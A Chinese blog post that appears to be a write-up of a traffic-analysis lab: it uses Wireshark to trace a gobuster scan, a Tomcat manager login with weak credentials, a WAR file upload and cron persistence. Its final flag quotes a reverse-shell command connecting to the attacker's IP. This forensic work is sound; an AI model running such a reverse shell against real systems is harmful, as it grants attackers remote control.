当前位置: 首页 > news >正文

玄机平台流量特征分析-常见攻击事

前言

熟悉常见的攻击流量特征,我们就可以通过主机的一个流量情况来判断主机遭受了何种攻击。这里来看看玄机平台的一道题目。

步骤1.1

这里需要我们找出恶意扫描者,也就是黑客的ip。下载好附件之后用wiresharke打开,直接筛选http协议的流量。

大概浏览一下,发现14.0.0.120这个ip大概率在扫描网站的目录。第一个flag就是这个

flag{14.0.0.120}

步骤1.2

这里要求我们找到ip所在的城市,直接到网上ip定位就行了,位置是在广州。

flag{guangzhou}

步骤1.3

这里要求我们找到哪一个端口提供对web服务器管理面板的访问,在刚刚筛选的http中出现了一个post的请求,因为上面全都是get请求,突然出现一个post有点可疑。

http追踪流看看,发现访问的端口为8080,说明这是个tomcat的服务。

flag{8080}

步骤1.4

这里要求我们判断黑客用的工具,随便选一个黑客ip目录扫描的流量。http追踪流查看,UA头暴露了工具。

flag{gobuster}

步骤1.5

这里要求我们找出用户名和密码,我们回到上面说到的post请求的流量包中。这里要拓展一下Authorization这玩意,Authorization 请求头是一种特殊的 HTTP 头部,允许客户端向服务器传达认证信息,格式如下。type表示数据加密类型,credentials是需要传递的认证信息。如账号密码、密钥等。
 

  • Basic :用于 http-basic 认证;

  • Bearer :常见于 OAuth 和 JWT 授权;

  • Digest MD5 :哈希的 http-basic 认证 (已弃用)

  • AWS4-HMAC-SHA256 AWS 授权

Authorization: <type> <credentials>

可以看到账号密码是经过了base64加密,我们只需解密即可。

flag{admin-tomcat}

步骤1.6

要求我们找到恶意提交文件的名称,可以看到我们的post包的请求url中有upload,猜测是在进行文件上传。再看下面有个filename=JXQOZY.war,可以推测是上传了一个JXQOZY.war文件。

flag{JXQOZY.war}

步骤1.7

要求我们找到权限维持的相关信息,linux的权限维持基本都是再起一个bash。直接搜一下那个包里面有/bin/bash这种关键字。

tcp contains "/bin/bash"

找到两个,我们tcp追踪流打开看看。里面是提权后执行的命令,那么可以看出来是往定时任务里面写入反弹shell的语句,以达到维持权限的目的。

flag{/bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'}

总结

最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。

相关文章:

  • 卡本医疗VENUS登陆香港国际医疗展,探索全球医疗发展新机遇
  • 统计学一(术语,正态)
  • 【前端面经】数组算法题解
  • 制造业为什么需要ERP企业管理软件?
  • 我用chatgpt写了一款程序
  • 内部类介绍
  • reverse-android-实战喜马拉雅-ollvm
  • 【Java】已解决java.lang.NullPointerException异常
  • VBA学习(10):按名称批量将图片插入到表格中
  • Android-app自动更新总结(已适配9-0)(1)
  • DP动态规划(下)
  • 【产品经理】订单处理8-智能分仓
  • 面向对象的程序设计:对象数组,对象指针书后习题——第九章(P295)第九题
  • SpringBoot配置第三方专业缓存框架j2cache
  • 游戏心理学Day18
  • [Vue CLI 3] 配置解析之 css.extract
  • 【划重点】MySQL技术内幕:InnoDB存储引擎
  • 0x05 Python数据分析,Anaconda八斩刀
  • 345-反转字符串中的元音字母
  • android 一些 utils
  • const let
  • Docker 笔记(1):介绍、镜像、容器及其基本操作
  • iOS仿今日头条、壁纸应用、筛选分类、三方微博、颜色填充等源码
  • JS字符串转数字方法总结
  • laravel with 查询列表限制条数
  • linux学习笔记
  • node和express搭建代理服务器(源码)
  • PHP的类修饰符与访问修饰符
  • React16时代,该用什么姿势写 React ?
  • Transformer-XL: Unleashing the Potential of Attention Models
  • 短视频宝贝=慢?阿里巴巴工程师这样秒开短视频
  • 面试遇到的一些题
  • 如何解决微信端直接跳WAP端
  • 在weex里面使用chart图表
  • LevelDB 入门 —— 全面了解 LevelDB 的功能特性
  • 策略 : 一文教你成为人工智能(AI)领域专家
  • # Redis 入门到精通(九)-- 主从复制(1)
  • # 再次尝试 连接失败_无线WiFi无法连接到网络怎么办【解决方法】
  • ### Cause: com.mysql.jdbc.exceptions.jdbc4.MySQLTr
  • #NOIP 2014# day.1 T2 联合权值
  • (1)Map集合 (2)异常机制 (3)File类 (4)I/O流
  • (6) 深入探索Python-Pandas库的核心数据结构:DataFrame全面解析
  • (C语言)逆序输出字符串
  • (LeetCode 49)Anagrams
  • (分享)自己整理的一些简单awk实用语句
  • (剑指Offer)面试题41:和为s的连续正数序列
  • (五)MySQL的备份及恢复
  • **登录+JWT+异常处理+拦截器+ThreadLocal-开发思想与代码实现**
  • .360、.halo勒索病毒的最新威胁:如何恢复您的数据?
  • .gitignore文件—git忽略文件
  • .NET Core WebAPI中封装Swagger配置
  • .net core使用RPC方式进行高效的HTTP服务访问
  • .NET 解决重复提交问题
  • .NetCore项目nginx发布
  • .NET中GET与SET的用法